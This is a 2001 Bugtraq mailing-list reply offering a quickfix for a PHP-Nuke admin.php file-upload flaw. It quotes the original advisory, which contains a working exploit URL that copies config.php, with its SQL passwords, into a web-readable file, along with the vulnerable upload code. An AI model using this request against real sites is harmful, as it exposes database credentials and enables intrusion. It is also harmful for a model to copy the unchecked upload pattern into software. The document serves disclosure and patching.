Re: twlc advisory: all versions of php nuke are vulnerable...

["Magnus Skjegstad" <magnus () skjegstad com>]

Alternative "quickfix"; change
"if($upload) {" to
"if (($upload) && ($admintest)) {"

This at least works for PostNuke 0.62. I have not tested the latest PostNuke 0.63 - it may be vulnerable as well...

And btw; if you're not going to use the filemanager, disallow write access for the webuser (usually nobody or www) to 
all files/directories below webroot. 


Magnus Skjegstad

----- Original Message ----- 
From: <supergate () twlc net>
To: "bugtraq" <bugtraq () securityfocus com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...


> Explanation
> Do you need sql password?
>
> http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
> t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted just go to
> http://www.server.net/images/hacked.txt and you will see config.php that as
> everyone knows contain the sql's passwords, you can even upload files...i
> leave you the 'fun' to find all the ways to use it... and try to dont be a
> SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
> LET YOU HAVE FUN.
>
> let me explain you the bug... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
>     copy($userfile,$basedir.$wdir.$userfile_name);
>     $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
>     // This need a rewrite -------------------------------------> OMG! WE
> AGREEEEEEEE lmao
>     //include("header.php");
>     //GraphicAdmin($hlpfile);
>     //html_header();
>     //displaydir();
>     $wdir2="/";
>     chdir($basedir . $wdir2);
>     //CloseTable();
>     //include("footer.php");
>     Header("Location: admin.php?op=FileManager");
>     exit;
> }